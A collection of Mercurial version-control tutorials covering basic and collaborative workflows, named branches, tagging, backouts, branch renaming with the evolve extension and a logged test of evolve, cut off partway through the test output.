If you want a more exhaustive tutorial with the basics, please have a look at the Tutorial in the Mercurial Wiki. For a really detailed and very nice to read description of Mercurial, please have a look at Mercurial: The Definitive Guide.

Note:

This guide doesn't require any prior knowledge of version control systems (though subversion users will likely feel at home quite quickly). Basic command line abilities are helpful, because we'll use the command line client.

Basic workflows

We go from simple to more complex workflows. Those further down build on previous workflows.

Log keeping

Use Case

The first workflow is also the easiest one: You want to use Mercurial to be able to look back when you did which changes.

This workflow only requires an installed Mercurial and write access to some file storage (you almost definitely have that :) ). It shows the basic techniques for more complex workflows.

Workflow

Prepare Mercurial

As first step, you should teach Mercurial your name. For that you open the file ~/.hgrc (or mercurial.ini in your home directory for Windows) with a text-editor and add the ui section (user interaction) with your username:

[ui]
username = Mr. Johnson <johnson@smith.com>

Initialize the project

Now you add a new folder in which you want to work:

$ hg init project

Add files and track them

$ cd project
$ (add files)
$ hg add
$ hg commit
(enter the commit message)

Note:

You can also go into an existing directory with files and init the repository there.

$ cd project
$ hg init

Alternatively you can add only specific files instead of all files in the directory. Mercurial will then track only these files and won't know about the others. The following tells mercurial to track all files whose names begin with "file0" as well as file10, file11 and file12.

$ hg add file0* file10 file11 file12

Save changes

$ (do some changes)

see which files changed, which have been added or removed, and which aren't tracked yet

$ hg status

see the exact changes

$ hg diff

commit the changes.

$ hg commit

now an editor pops up and asks you for a commit message. Upon saving and closing the editor, your changes have been stored by Mercurial.

Note:

You can also supply the commit message directly via hg commit -m 'MESSAGE'.

Move and copy files

When you copy or move files, you should tell Mercurial to do the copy or move for you, so it can track the relationship between the files.

Remember to commit after moving or copying. From the basic commands only commit creates a new revision

$ hg cp original copy
$ hg commit
(enter the commit message)
$ hg mv original target
$ hg commit
(enter the commit message)

Now you have two files, "copy" and "target", and Mercurial knows how they are related.

Note:

Should you forget to do the explicit copy or move, you can still tell Mercurial to detect the changes via hg addremove --similarity 100. Just use hg help addremove for details.

Check your history

$ hg log

This prints a list of changesets along with their date, the user who committed them (you) and their commit message.

To see a certain revision, you can use the -r switch (--revision). To also see the diff of the displayed revisions, there's the -p switch (--patch)

$ hg log -p -r 3

Lone developer with nonlinear history

Use case

The second workflow is still very easy: You're a lone developer and you want to use Mercurial to keep track of your own changes.

It works just like the log keeping workflow, with the difference that you go back to earlier changes at times.

To start a new project, you initialize a repository, add your files and commit whenever you finished a part of your work.

Also you check your history from time to time, so see how you progressed.

Workflow

Basics from log keeping

Init your project, add files, see changes and commit them.

$ hg init project
$ cd project
$ (add files)
$ hg add # tell Mercurial to track all files
$ (do some changes)
$ hg diff # see changes
$ hg commit # save changes
$ hg cp # copy files or folders
$ hg mv # move files or folders
$ hg log # see history

Seeing an earlier revision

Different from the log keeping workflow, you'll want to go back in history at times and do some changes directly there, for example because an earlier change introduced a bug and you want to fix it where it occurred.

To look at a previous version of your code, you can use update. Let's assume that you want to see revision 3.

$ hg update 3

Now your code is back at revision 3, the fourth commit (Mercurial starts counting at 0).
To check if you're really at that revision, you can use identify -n.

$ hg identify -n

Note:

identify without options gives you the short form of a unique revision ID. That ID is what Mercurial uses internally. If you tell someone about the version you updated to, you should use that ID, since the numbers can be different for other people. If you want to know the reasons behind that, please read up Mercurials [basic concepts]. When you're at the most recent revision, hg identify -n will return "-1".

To update to the most recent revision, you can use "tip" as revision name.

$ hg update tip

Note:

If at any place any command complains, your best bet is to read what it tells you and follow that advice.

Note:

Instead of hg update you can also use the shorthand hg up. Similarly you can abbreviate hg commit to hg ci.

Note:

To get a revision devoid of files, just update to "null" via hg update null. That's the revision before any files were added.

Fixing errors in earlier revisions

When you find a bug in some earlier revision you have two options: either you can fix it in the current code, or you can go back in history and fix the code exactly where you did it, which creates a cleaner history.

To do it the cleaner way, you first update to the old revision, fix the bug and commit it. Afterwards you merge this revision and commit the merge. Don't worry, though: Merging in mercurial is fast and painless, as you'll see in an instant.

Let's assume the bug was introduced in revision 3.

$ hg update 3
$ (fix the bug)
$ hg commit

Now the fix is already stored in history. We just need to merge it with the current version of your code.

$ hg merge

If there are conflicts use hg resolve - that's also what merge tells you to do in case of conflicts.

First list the files with conflicts

$ hg resolve --list

Then resolve them one by one. resolve attempts the merge again

$ hg resolve conflicting_file
(fix it by hand, if necessary)

Mark the fixed file as resolved

$ hg resolve --mark conflicting_file

Commit the merge, as soon as you resolved all conflicts. This step is also necessary when there were no conflicts!

$ hg commit

At this point, your fix is merged with all your other work, and you can just go on coding. Additionally the history shows clearly where you fixed the bug, so you'll always be able to check where the bug was.

Note:

Most merges will just work. You only need resolve, when merge complains.

So now you can initialize repositories, save changes, update to previous changes and develop in a nonlinear history by committing in earlier changesets and merging the changes into the current code.

Note:

If you fix a bug in an earlier revision, and some later revision copied or moved that file, the fix will be propagated to the target file(s) when you merge. This is the main reason why you should always use hg cp and hg mv.

Separate features

Use Case

At times you'll be working on several features in parallel. If you want to avoid mixing incomplete code versions, you can create clones of your local repository and work on each feature in its own code directory.

After finishing your feature you then pull it back into your main directory and merge the changes.

Workflow

Work in different clones

First create the feature clone and do some changes

$ hg clone project feature1
$ cd feature1
$ (do some changes and commits)

Now check what will come in when you pull from feature1, just like you can use diff before committing. The respective command for pulling is incoming

$ cd ../project
$ hg incoming ../feature1

Note:

If you want to see the diffs, you can use hg incoming --patch just as you can do with hg log --patch for the changes in the repository.

If you like the changes, you pull them into the project

$ hg pull ../feature1

Now you have the history of feature1 inside your project, but the changes aren't yet visible. Instead they are only stored inside a ".hg" directory of the project (more information on the store).

Note:

From now on we'll use the name "repository" for a directory which has a .hg directory with Mercurial history.

If you didn't do any changes in the project, while you were working on feature1, you can just update to tip (hg update tip), but it is more likely that you'll have done some other changes in between changes. In that case, it's time for merging.

Merge feature1 into the project code

$ hg merge

If there are conflicts use hg resolve - that's also what merge tells you to do in case of conflicts. After you merge, you have to commit explicitly to make your merge final

$ hg commit
(enter commit message, for example "merged feature1")

You can create an arbitrary number of clones and also carry them around on USB sticks. Also you can use them to synchronize your files at home and at work, or between your desktop and your laptop.

Note:

You also have to commit after a merge when there are no conflicts, because merging creates new history and you might want to attach a specific message to the merge (like "merge feature1").

Rollback mistakes

Now you can work on different features in parallel, but from time to time a bad commit might sneak in. Naturally you could then just go back one revision and merge the stray error, keeping all mistakes out of the merged revision. However, there's an easier way, if you realize your error before you do another commit or pull: rollback.

Rolling back means undoing the last operation which added something to your history.

Imagine you just realized that you did a bad commit - for example you didn't see a spelling error in a label. To fix it you would use

hg rollback

And then redo the commit

hg commit -m "message"

If you can use the command history of your shell and you added the previous message via commit -m "message", that following commit just means two clicks on the arrow-key "up" and one click on "enter".

Though it changes your history, rolling back doesn't change your files. It only undoes the last addition to your history.

But beware, that a rollback itself can't be undone. If you rollback and then forget to commit, you can't just say "give me my old commit back". You have to create a new commit.

Note:

Rollback is possible, because Mercurial uses transactions when recording changes, and you can use the transaction record to undo the last transaction. This means that you can also use rollback to undo your last pull, if you didn't yet commit anything new.

Sharing changes

Use Case

Now we go one step further: You are no longer alone, and you want to share your changes with others and include their changes.

The basic requirement for that is that you have to be able to see the changes of others.

Mercurial allows you to do that very easily by including a simple webserver from which you can pull changes just as you can pull changes from local clones.

Note:

There are a few other ways to share changes, though. Instead of using the builtin webserver, you can also send the changes by email or setup a shared repository, to where you push changes instead of pulling them. We'll cover one of those later.

Workflow

Using the builtin webserver

This is the easiest way to quickly share changes.

First the one who wants to share his changes creates the webserver

$ hg serve

Now all others can point their browsers to his IP address (for example 192.168.178.100) at port 8000. They will then see all his history there and can decide if they want to pull his changes.

$ firefox http://192.168.178.100:8000

If they decide to include the changes, they just pull from the same URL

$ hg pull http://192.168.178.100:8000

At this point you all can work as if you had pulled from a local repository. All the data is now in your individual repositories and you can merge the changes and work with them without needing any connection to the served repository.

Sending changes by email

Often you won't have direct access to the repository of someone else, be it because he's behind a restrictive firewall, or because you live in different timezones. You might also want to keep your changes confidential and prefer internal email (if you want additional protection, you can also encrypt the emails, for example with GnuPG).

In that case, you can easily export your changes as patches and send them by email.

Another reason to send them by email can be that your policy requires manual review of the changes when the other developers are used to reading diffs in emails. I'm sure you can think of more reasons.

Sending the changes via email is pretty straightforward with Mercurial. You just export your changes and attach (or copy paste) it in your email. Your colleagues can then just import them.

First check which changes you want to export

$ cd project
$ hg log

We assume that you want to export changeset 3 and 4

$ hg export 3 > change3.diff
$ hg export 4 > change4.diff

Now attach them to an email and your colleagues can just run import on both diffs to get your full changes, including your user information.

To be careful, they first clone their repository to have an integration directory as sandbox

$ hg clone project integration
$ cd integration
$ hg import change3.diff
$ hg import change4.diff

That's it. They can now test your changes in feature clones. If they accept them, they pull the changes into the main repository

$ cd ../project
$ hg pull ../integration

Note:

The patchbomb extension automates the email-sending, but you don't need it for this workflow.

Note:

You can also send around bundles, which are snippets of your actual history. Just create them via

$ hg bundle --base FIRST_REVISION_TO_BUNDLE changes.bundle

Others can then get your changes by simply pulling them, as if your bundle were an actual repository

$ hg pull path/to/changes.bundle

Using a shared repository

Sending changes by email might be the easiest way to reach people when you aren't yet part of the regular development team, but it creates additional workload: You have to bundle the changes, send mails and then import the bundles manually. Luckily there's an easier way which works quite well: The shared push repository.

Till now we transferred all changes either via email or via pull. Now we use another option: pushing. As the name suggests it's just the opposite of pulling: You push your changes into another repository.

But to make use of it, we first need something we can push to.

By default hg serve doesn't allow pushing, since that would be a major security hole. You can allow pushing in the server, but that's no solution when you live in different timezones, so we'll go with another approach here: Using a shared repository, either on an existing shared server or on a service like BitBucket. Doing so has a bit higher starting cost and takes a bit longer to explain, but it's well worth the effort spent.

If you want to use an existing shared server, you can use serve there and allow pushing. Also there are some other nice ways to allow pushing to a Mercurial repository, including simple access via SSH.

Otherwise you first need to setup a BitBucket Account. Just signup at BitBucket. After signing up (and login) hover your mouse over "Repositories". There click the item at the bottom of the opening dialog which say "Create new".

Give it a name and a description. If you want to keep it hidden from the public, select "private"

$ firefox http://bitbucket.org

Now your repository is created and you see instructions for pushing to it. For that you'll use a command similar to the following (just with a different URL)

$ hg push https://bitbucket.org/ArneBab/hello/

(Replace the URL with the URL of your created repository. If your username is "Foo" and your repository is named "bar", the URL will be https://bitbucket.org/Foo/bar/)

Mercurial will ask for your BitBucket name and password, then push your code.

Voilà, your code is online.

Note:

You can also use SSH for pushing to BitBucket.

Now it's time to tell all your colleagues to sign up at BitBucket, too.

After that you can click the "Admin" tab of your created repository and add the usernames of your colleagues on the right side under "Permission: Writers". Now they are allowed to push code to the repository.

(If you chose to make the repository private, you'll need to add them to "Permission: Readers", too)

If one of you now wants to publish changes, he'll simply push them to the repository, and all others get them by pulling.

Publish your changes

$ hg push https://bitbucket.org/ArneBab/hello/

Pull others changes into your local repository

$ hg pull https://bitbucket.org/ArneBab/hello/

People who join you in development can also just clone this repository, as if one of you were using hg serve

$ hg clone https://bitbucket.org/ArneBab/hello/ hello

That local repository will automatically be configured to pull/push from/to the online repository, so new contributors can just use hg push and hg pull without an URL.

Note:

To make this workflow more scalable, each one of you can have his own BitBucket repository and you can simply pull from the others repositories. That way you can easily establish workflows in which certain people act as integrators and finally push checked code to a shared pull repository from which all others pull.

Note:

You can also use this workflow with a shared server instead of BitBucket, either via SSH or via a shared directory. An example for an SSH URL with Mercurial is be ssh://user@example.com/path/to/repo. When using a shared directory you just push as if the repository in the shared directory were on your local drive.

Summary

Now let's take a step back and look where we are.

With the commands you already know, a bit reading of hg help <command> and some evil script-fu you can already do almost everything you'll ever need to do when working with source code history. So from now on almost everything is convenience, and that's a good thing.

First this is good, because it means, that you can now use most of the concepts which are utilized in more complex workflows.

Second it aids you, because convenience lets you focus on your task instead of focusing on your tool. It helps you concentrate on the coding itself. Still you can always go back to the basics, if you want to.

A short summary of what you can do which can also act as a short check, if you still remember the meaning of the commands.

create a project

$ hg init project
$ cd project
$ (add some files)
$ hg add
$ hg commit
(enter the commit message)

do nonlinear development

$ (do some changes)
$ hg commit
(enter the commit message)
$ hg update 0
$ (do some changes)
$ hg commit
(enter the commit message)
$ hg merge
$ (optionally hg resolve)
$ hg commit
(enter the commit message)

use feature clones

$ cd ..
$ hg clone project feature1
$ cd feature1
$ (do some changes)
$ hg commit
(enter the commit message)
$ cd ../project
$ hg pull ../feature1

share your repository via the integrated webserver

$ hg serve &
$ cd ..
$ hg clone http://127.0.0.1:8000 project-clone

export changes to files

$ cd project-clone
$ (do some changes)
$ hg commit
(enter the commit message)
$ hg export tip > ../changes.diff

import changes from files

$ cd ../project
$ hg import ../changes.diff

pull changes from a served repository (hg serve still runs on project)

$ cd ../feature1
$ hg pull http://127.0.0.1:8000

Use shared repositories on BitBucket

$ (setup bitbucket repo)
$ hg push https://bitbucket.org/USER/REPO
(enter name and password in the prompt)
$ hg pull https://bitbucket.org/USER/REPO

Let's move on towards useful features and a bit more advanced workflows.

Advanced workflows

Backing out bad revisions

Use Case

When you routinely pull code from others, it can happen that you overlook some bad change. As soon as others pull that change from you, you have little chance to get completely rid of it.

To resolve that problem, Mercurial offers you the backout command. Backing out a change means, that you tell Mercurial to create a commit which reverses the bad change. That way you don't get rid of the bad code in history, but you can remove it from new revisions.

Note:

The basic commands don't directly rewrite history. If you want to do that, you need to activate some of the extensions which are shipped with mercurial. We'll come to that later on.

Workflow

Let's assume the bad change was revision 3, and you already have one more revision in your
repository. To remove the bad code, you can just backout of it. This creates a new
change which reverses the bad change. After backing out, you can then merge that new change
into the current code.

$ hg backout 3
$ hg merge
(potentially resolve conflicts)
$ hg commit
(enter commit message. For example: "merged backout")

That's it. You reversed the bad change. It's still recorded that it was once there (following the principle "don't rewrite history, if it's not really necessary"), but it doesn't affect future code anymore.

Collaborative feature development

Now that you can share changes and reverse them if necessary, you can go one step further: Using Mercurial to help in coordinating the coding.

The first part is an easy way to develop features together, without requiring every developer to keep track of several feature clones.

Use Case

When you want to split your development into several features, you need to keep track of who works on which feature and where to get which changes.

Mercurial makes this easy for you by providing named branches. They are a part of the main repository, so they are available to everyone involved. At the same time, changes committed on a certain branch don't get mixed with the changes in the default branch, so features are kept separate, until they get merged into the default branch.

Note:

Cloning a repository always puts you onto the default branch at first.

Workflow

When someone in your group wants to start coding on a feature without disturbing the others, he can create a named branch and commit there. When someone else wants to join in, he just updates to the branch and commits away. As soon as the feature is finished, someone merges the named branch into the default branch.

Working in a named branch

Create the branch

$ hg branch feature1
(do some changes)
$ hg commit
(write commit message)

Update into the branch and work in it

$ hg update feature1
(do some changes)
$ hg commit
(write commit message)

Now you can commit, pull, push and merge (and anything else) as if you were working in a separate repository. If the history of the named branch is linear and you call "hg merge", Mercurial asks you to specify an explicit revision, since the branch in which you work doesn't have anything to merge.

Merge the named branch

When you finished the feature, you merge the branch back into the default branch.

$ hg update default
$ hg merge feature1
$ hg commit
(write commit message)

And that's it. Now you can easily keep features separate without unnecessary bookkeeping.

Note:

Named branches stay in history as permanent record after you finished your work. If you don't like having that record in your history, please have a look at some of the advanced workflows.

Tagging revisions

Use Case

Since you can now code separate features more easily, you might want to mark certain revisions as fit for consumption (or similar). For example you might want to mark releases, or just mark off revisions as reviewed.

For this Mercurial offers tags. Tags add a name to a revision and are part of the history. You can tag a change years after it was committed. The tag includes the information when it was added, and tags can be pulled, pushed and merged just like any other committed change.

Note:

A tag must not contain the char ":", since that char is used for specifying multiple revisions - see "hg help revisions".

Note:

To securely mark a revision, you can use the gpg extension to sign the tag.

Workflow

Let's assume you want to give revision 3 the name "v0.1".

Add the tag

$ hg tag -r 3 v0.1

See all tags

$ hg tags

When you look at the log you'll now see a line in changeset 3 which marks the Tag. If someone wants to update to the tagged revision, he can just use the name of your tag

$ hg update v0.1

Now he'll be at the tagged revision and can work from there.

Removing history

Use Case

At times you will have changes in your repository, which you really don't want in it.

There are many advanced options for removing these, and most of them use great extensions (Mercurial Queues is the most often used one), but in this basic guide, we'll solve the problem with just the commands we already learned. But we'll use an option to clone which we didn't yet use.

This workflow becomes inconvenient when you need to remove changes, which are buried below many new changes. If you spot the bad changes early enough, you can get rid of them without too much effort, though.

Workflow

Let's assume you want to get rid of revision 2 and the highest revision is 3.

The first step is to use the "--rev" option to clone: Create a clone which only contains the changes up to the specified revision. Since you want to keep revision 1, you only clone up to that

$ hg clone -r 1 project stripped

Now you can export the change 3 from the original repository (project) and import it into the stripped one

$ cd project
$ hg export 3 > ../changes.diff
$ cd ../stripped
$ hg import ../changes.diff

If a part of the changes couldn't be applied, you'll see that part in *.rej files. If you have *.rej files, you'll have to include or discard changes by hand

$ cat *.rej
(apply changes by hand)
$ hg commit
(write commit message)

That's it. hg export also includes the commit message, date, committer and similar metadata, so you are already done.

Note:

removing history will change the revision IDs of revisions after the removed one, and if you pull from someone else who still has the revision you removed, you will pull the removed parts again. That's why rewriting history should most times only be done for changes which you didn't yet publicise.

Summary

So now you can work with Mercurial in private, and also share your changes in a multitude of ways.

Additionally you can remove bad changes, either by creating a change in the repository which reverses the original change, or by really rewriting history, so it looks like the change never occurred.

And you can separate the work on features in a single repository by using named branches and add tags to revisions which are visible markers for others and can be used to update to the tagged revisions.

With this we can conclude our practical guide.

More Complex Workflows

If you now want to check some more complex workflows, please have a look at the general workflows wikipage.

To deepen your understanding, you should also check the basic concept overview.

Have fun with Mercurial!

License

Learning Mercurial in Workflows - A practical guide to version tracking / source code management with Mercurial
Copyright © 2011 Arne Babenhauserheide (main author), David Soria Parra, Augie Fackler, Benoit Boissinot, Adrian Buehlmann, Nicolas Dumazet and Steve Losh.

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

Mercurial Workflow: Feature seperation via named branches

Also published on Mercurials Workflows wikipage. Originally written for PyHurd: Python bindings for the GNU Hurd.

For Whom?

If you

  1. want to develop features collaboratively and you want to be able to see later for which feature a given change was added or
  2. want to do changes concurrently which would likely affect each other negatively while they are not finished, but which need to be developed in a group with minimal overhead,

then this workflow might be right for you.

Note: If you have a huge number of small features (2000 and upwards), the number of persistent named branches can create some performance problems for listing the branches (only for the listing!) (as different example, pushing is unaffected: Linear history is just as fast as 2000 branches). For features which need no collaboration or need only a few commits, this workflow also has much unnecessary overhead. It is best used for features which will be developed side by side with default for some time (and many commits), so tracking the default branch against the feature is relevant. To mark single-commit features as belonging to a feature, just use the commit message.

Note: The difference between Mercurial named branches and git branches is that git branches don’t stay in history. They don’t allow you to find out later in which branch a certain commit was added. If you want git-style branching, just use bookmarks.

Note: If you avoid using stable as branch name, you can always upgrade this workflow to the complete branching model later on.

What you need

Just vanilla Mercurial.

Workflow

The workflow is 6-stepped:

  1. create the new feature,
  2. Implement and share,
  3. merge other changes into it,
  4. merge stable features,
  5. close finished features and
  6. reopen features.

Let’s see the steps in detail.

1. New feature

First start a new branch with the name of the feature (starting from default).

hg branch feature-x
\# do some changes
hg commit -m "Started implemented feature-x"

2. Implement and share

Then commit away and push whenever you finish something which might be of interest to others, regardless how marginal.

You can push to a shared repository, or to your own clone or even send the changes via email to other contributors (for example via the mailbomb extension).

3. Merge in default

Merge changes in the default branch into your feature as often as possible to reduce the work necessary when you want to merge the feature later on.

hg update feature-x
hg merge default
hg commit -m "merged default into feature-x"

4. Merge stable features

When your feature is stable, merge it into default.

hg update default
hg merge feature-x
hg commit -m "merged feature-x"

5. Close the branch when it’s done

And when the feature needs no more work, close the branch.

\# start from default, automatic when using a fresh clone
hg update default
hg branch feature-x
\# do some changes
hg commit -m "started feature X" 
hg push 
\# commit and push as you like
hg update default
hg merge feature-x
hg ci -m "merged feature X into default"
hg commit --close-branch -m "finished feature X"

This hides the branch from the output of hg branches, so you don’t clutter your history.

6. Reopen the feature

To improve a feature after it was officially closed, first merge default into the feature branch (to get it up to date), then work just as if you had started it.

hg up feature-x
hg merge default
hg ci -m "merged default into feature X"
\# commit, push, repeat, finish

Generally merge default into your feature as often as possible.

Epilog

If this workflow helps you, I’d be glad to hear from you!

For a more extensive project-workflow, have a look at the Complete Mercurial Branching Strategy. It extends the feature branches workflow to account for release cycles.

Mercurial for two Programmers who are (mostly) new to SCM

Written in the Mercurial mailing list

Hi Bernard,

Am Dienstag 03 Februar 2009 20:19:14 schrieb ... ...:
> Most of the docs I can find seem to assume the reader is familiar with
> existing software developemnt tools and methodologies.
>
> This is not the case for me.

It wasn't for me either, and I can assure you that using Mercurial becomes
natural quite quickly.

> Now, I need to coordinate with a second (also SCM clueless) programmer.
...
> I envision us both working the main trunk for many small day-to-day
> changes, and our own isolated repo for larger additions that we will each
> be working on.

I don't know about a HOWTO, but I can give you a short description about basic
usage and the workflow I'd use:

Basic usage

  • Just commit as you'd have done in SVN via "hg commit".
  • To get changes from others, do "hg pull -u".
    The "-u" says 'update my files'. Always commit before you pull. Otherwise "hg pull -u" will try to merge the new changes.
  • If you already committed and then pull changes from someone else, you merge
    the changes with yours via "hg merge". Merging is quite painless in Mercurial, so you can easily do it often.
  • Once you want to share your changes, do "hg push".
    Should that complain about "adding heads", pull and merge, then do the push again. If you really want to create new remote heads, you can use "hg push -f".

Workflow

  • Firstoff: Create a main repository you both can push changes to. If you have ssh access to a shared machine, that's as simple as creating a repository on that machine via "hg init project".
  • Now both of you clone from that repository via
    hg clone ssh://USER@ADDRESS:path/to/project project

    (ADDRESS can be either a host or an IP).

    That's your repository for the small day to day changes.

  • If you want to do bigger changes, you create a feature clone via
    hg clone project feature1

    In that clone you simply work, pull and commit as usual, but you only push after you finished the feature.

    Once you finished the feature, you push the changes from the feature clone via "hg push" in feature1 (which gets them into your main working clone) and then push then onward into the shared repository.

That's it - or rather that's what I'd do. It might be right for you, too, and
if it isn't, don't be shy of experimenting. As long as you have a backup clone
lying around (for example cloned to a USB stick via "hg clone project
path/to/stick/project"), you can't do too much damage :)

I hope I could provide a bit of help :)

Renaming a Mercurial branch with the evolve extension

Short version (rename from $OLD to $NEW):

ROOT="$(hg id -qr 'first(roots(branch('$OLD')))')"
MSG="$(hg log -r $ROOT -T '{desc}')"  

hg update $ROOT
hg branch $NEW
hg commit --amend -m "$MSG"
hg evolve --all

Mercurial records in which named branch a commit was created. This can be inconvenient when you choose temporary branch names like "foo" or "justworkdamnit".

The evolve extension enables safe, collaborative history editing which removes this inconvenience while preserving the reliability guarantees of Mercurial.

Here I show in a quick example how to rename a branch in Mercurial using the evolve extension.

You can use this method for all changes which you did not transfer elsewhere yet (they must be in draft or secret phase).

Note (2016): The evolve extension is still in testing. Do not use it for production yet. If you want to help stabilizing it, please join evolve-testers. I’ve been using it for more than a year, but I know how to fix things when I hit a bug in the evolve extension.

Setup evolve

hg clone https://www.mercurial-scm.org/repo/evolve/ ~/.local/share/hgext-evolve
echo "[extensions]
evolve = ~/.local/share/hgext-evolve/hgext/evolve.py" >> ~/.hgrc

Rename a branch

create repo with wrong branch name

hg init foo
cd foo
echo 1 > 1
hg ci -Am 1
echo stable > 1
hg branch stapling
hg ci -m stable
# add a second commit to the branch
# to make this non-trivial
echo stable2 > 1
hg ci -m stable2

change the branch name

# amend the first revision in the branch
hg up -r "first(branch(stapling))"
hg branch stable
hg ci --amend -m stable
# (notes that there is an unstable changeset)
# evolve the history
hg evolve

and check that it’s correct

hg log -G

That’s it.

Result

@  changeset:   5:1822f3b02b72
|  branch:      stable
|  tag:         tip
|  user:        Freenet
|  date:        Fri Nov 18 00:56:57 2016 +0100
|  summary:     stable2
|
o  changeset:   4:d47764612e1a
|  branch:      stable
|  parent:      0:d2b5bb69b11b
|  user:        Freenet
|  date:        Fri Nov 18 00:56:56 2016 +0100
|  summary:     stable
|
o  changeset:   0:d2b5bb69b11b
   user:        Freenet
   date:        Fri Nov 18 00:56:55 2016 +0100
   summary:     1

☺ Yay! ☺

Happy Hacking!

PS: If you want to share this: Short on GNU social

PPS: If you want to tweet this:

PPPS: For efficient collaboration via Mercurial see the complete branching strategy.

Test of the hg evolve extension for easier upstreaming

1 Rationale

PDF-version (for printing)

orgmode-version (for editing)

repository (for forking)

Currently I rework my code extensively before I push it into upstream SVN. Some of that is inconvenient and it would be nicer to have easy to use refactoring tools.

hg evolve might offer that.

This test uses the mutable-hg extension in revision c70a1091e0d8 (24 changesets after 2.1.0). It will likely be obsolete, soon, since mutable-hg is currently moved into Mercurial core by Pierre-Yves David, its main developer. I hope it will be useful for you, to assess the future possibilities of Mercurial today. This is not (only) a pun on “obsolete”, the functionality at the core of evolve which allows safe, collaborative history rewriting ☺

Table of Contents

2 Tests

# Tests for refactoring history with the evolve extension
export LANG=C # to get rid of localized strings
export PS1="$ "
rm -r testmy testother testpublic

2.1 Init

Initialize the repos I need for the test.

We have one public repo and 2 nonpublishing repos.

# Initialize the test repo
hg init testpublic # a public repo
hg init testmy # my repo
hg init testother # other repo
# make the two private repos nonpublishing
for i in my other
  do echo "[ui]
username = $i
[phases]
publish = False" > test${i}/.hg/hgrc
done

note: it would be nice if we could just specify nonpublishing with the init command.

2.2 Prepare

Prepare the content of the repos.

cd testmy
echo "Hello World" > hello.txt
hg ci -Am "Hello World"
hg log -G
cd ..

adding hello.txt
@  changeset:   0:c19ed5b17f4f
   tag:         tip
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

2.3 Amend

Add a bad change and amend it.

cd testmy
sed -i s/World/Evoluton/ hello.txt
hg ci -m "Hello Evolution"
echo
hg log -G
cat hello.txt
# FIX this up
sed -i s/Evoluton/Evolution/ hello.txt
hg amend -m "Hello Evolution" # pass the message explicitely again to avoid having the editor pop up
echo
hg log -G
cd ..

@  changeset:   1:83a5e89adea6
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:41 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World
Hello Evoluton

@  changeset:   3:129d59901401
|  tag:         tip
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

2.4 …together

Add a bad change. Followed by a good change. Pull both into another repo and amend it. Do a good change in the other repo. Then amend the bad change in the original repo, pull it into the other and evolve.

2.4.1 Setup

Now we change the format to planning a roleplaying session to have a more complex task. We want to present this as coherent story on how to plan a story, so we want clean history.

First I do my own change.

cd testmy
# Now we add the bad change
echo "Wishes:
- The Solek wants Action
- The Judicator wants Action

" >> plan.txt
hg ci -Am "What the players want"
# show what we did
echo
hg log -G -r tip
# and the good change
echo "Places: 
- The village
- The researchers cave
" >> plan.txt
hg ci -m "The places"
echo
hg log -G -r 1:
cd ..
  adding plan.txt

@  changeset:   4:b170dda0a4a7
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
 
@  changeset:   5:2a37053027cc
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   4:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now my file contains the wishes of the players as well as the places.

We pull the changes into the repo of another gamemaster with whom we plan this game.

hg -R testother pull -u testmy
hg -R testother log -G -r 1:
pulling from testmy
requesting all changes
adding changesets
adding manifests
adding file changes
added 4 changesets with 4 changes to 2 files
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
@  changeset:   3:2a37053027cc
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   2:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

note: the revisions numbers are different because the other repo only gets those obsolete revisions which are ancestors to non-obsolete revisions. That way evolve slowly cleans out obsolete revisions from the history without breaking repositories which already have them (but giving them a clear and easy path for evolution).

He then adds the important people:

cd testother
echo "People:
- The Lost
- The Specter
" >> plan.txt
hg ci -m "The people"
echo
hg log -G -r 1:
cd ..
 
@  changeset:   4:65cc97fc774a
|  tag:         tip
|  user:        other
|  date:        Sat Jan 12 00:17:48 2013 +0100
|  summary:     The people
|
o  changeset:   3:2a37053027cc
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   2:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

2.4.2 Fix my side

And I realize too late, that my estimate of the wishes of the players was wrong. So I simply amend it.

cd testmy
hg up -r -2
sed -i "s/The Solek wants Action/The Solek wants emotionally intense situations/" plan.txt
hg amend -m "The wishes of the players"
hg log -G -r 1:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1 new unstable changesets
@  changeset:   7:86e7a5305c9e
|  tag:         tip
|  parent:      3:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
| o  changeset:   5:2a37053027cc
| |  user:        my
| |  date:        Sat Jan 12 00:17:45 2013 +0100
| |  summary:     The places
| |
